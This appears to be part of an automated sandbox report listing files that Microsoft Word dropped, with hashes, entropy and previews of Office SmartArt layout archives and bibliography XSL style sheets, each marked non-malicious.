                                                                                      SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                      Malicious:false
                                                                                      Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):5630
                                                                                      Entropy (8bit):7.87271654296772
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                      MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                      SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                      SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                      SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                      Malicious:false
                                                                                      Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):6193
                                                                                      Entropy (8bit):7.855499268199703
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                      MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                      SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                      SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                      SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                      Malicious:false
                                                                                      Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):3075
                                                                                      Entropy (8bit):7.716021191059687
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                      MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                      SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                      SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                      SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                      Malicious:false
                                                                                      Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):5151
                                                                                      Entropy (8bit):7.859615916913808
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                      MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                      SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                      SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                      SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                      Malicious:false
                                                                                      Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):333258
                                                                                      Entropy (8bit):4.654450340871081
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                      MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                      SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                      SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                      SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):296658
                                                                                      Entropy (8bit):5.000002997029767
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                      MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                      SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                      SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                      SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):268317
                                                                                      Entropy (8bit):5.05419861997223
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                      MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                      SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                      SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                      SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):255948
                                                                                      Entropy (8bit):5.103631650117028
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                      MD5:9888A214D362470A6189DEFF775BE139
                                                                                      SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                      SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                      SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):251032
                                                                                      Entropy (8bit):5.102652100491927
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                      MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                      SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                      SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                      SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):284415
                                                                                      Entropy (8bit):5.00549404077789
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                      MD5:33A829B4893044E1851725F4DAF20271
                                                                                      SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                      SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                      SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLouserzed">.. <xsl:choose>.. <xsl:when test="b:StyleNameLouserzed/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLouserzed/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):294178
                                                                                      Entropy (8bit):4.977758311135714
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                      MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                      SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                      SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                      SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLouserzed">.. <xsl:choose>.. <xsl:when test="b:StyleNameLouserzed/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLouserzed/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):270198
                                                                                      Entropy (8bit):5.073814698282113
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                      MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                      SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                      SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                      SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):217137
                                                                                      Entropy (8bit):5.068335381017074
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                      MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                      SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                      SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                      SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):254875
                                                                                      Entropy (8bit):5.003842588822783
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                      MD5:377B3E355414466F3E3861BCE1844976
                                                                                      SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                      SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                      SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):344303
                                                                                      Entropy (8bit):5.023195898304535
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                      MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                      SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
